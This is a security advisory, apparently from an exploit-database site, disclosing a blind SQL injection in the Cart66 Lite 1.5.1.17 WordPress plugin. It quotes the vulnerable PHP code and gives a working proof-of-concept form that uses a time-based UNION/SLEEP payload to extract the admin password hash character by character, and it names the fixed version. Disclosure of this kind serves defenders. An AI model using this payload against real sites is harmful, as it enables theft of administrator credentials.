Cart66 Lite WordPress Ecommerce 1.5.1.17 Blind SQL Injection

2014-12-04 / 2014-12-09
Credit: Kacper Szurek
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 6.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8/10
Exploit range: Remote
Attack complexity: Low
Authentication: Single time
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

# Exploit Title: Cart66 Lite WordPress Ecommerce 1.5.1.17 Blind SQL Injection # Date: 29-10-2014 # Exploit Author: Kacper Szurek - http://security.szurek.pl/ http://twitter.com/KacperSzurek # Software Link: https://downloads.wordpress.org/plugin/cart66-lite.1.5.1.17.zip # Category: webapps 1. Description Cart66Ajax::shortcodeProductsTable() is accessible for every registered user. $postId is not escaped correctly (only html tags are stripped). File: cart66-lite\models\Cart66Ajax.php public static function shortcodeProductsTable() { global $wpdb; $prices = array(); $types = array(); $postId = Cart66Common::postVal('id'); $product = new Cart66Product(); $products = $product->getModels("where id=$postId", "order by name"); $data = array(); } http://security.szurek.pl/cart66-lite-wordpress-ecommerce-15117-blind-sql-injection.html 2. Proof of Concept Login as regular user (created using wp-login.php?action=register): <form action="http://wordpress-install/wp-admin/admin-ajax.php" method="post"> <input type="hidden" name="action" value="shortcode_products_table"> Blind SQL Injection: <input type="text" name="id" value="0 UNION (SELECT IF(substr(user_pass,1,1) = CHAR(36), SLEEP(5), 0) FROM wp_users WHERE ID = 1) -- "> <input value="Hack" type="submit"> </form> This SQL will check if first password character user ID=1 is $. If yes, it will sleep 5 seconds. 3. Solution: Update to version 1.5.2 https://wordpress.org/plugins/cart66-lite/changelog/ https://downloads.wordpress.org/plugin/cart66-lite.1.5.2.zip

References:

https://wordpress.org/plugins/cart66-lite/changelog/
https://downloads.wordpress.org/plugin/cart66-lite.1.5.2.zip


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top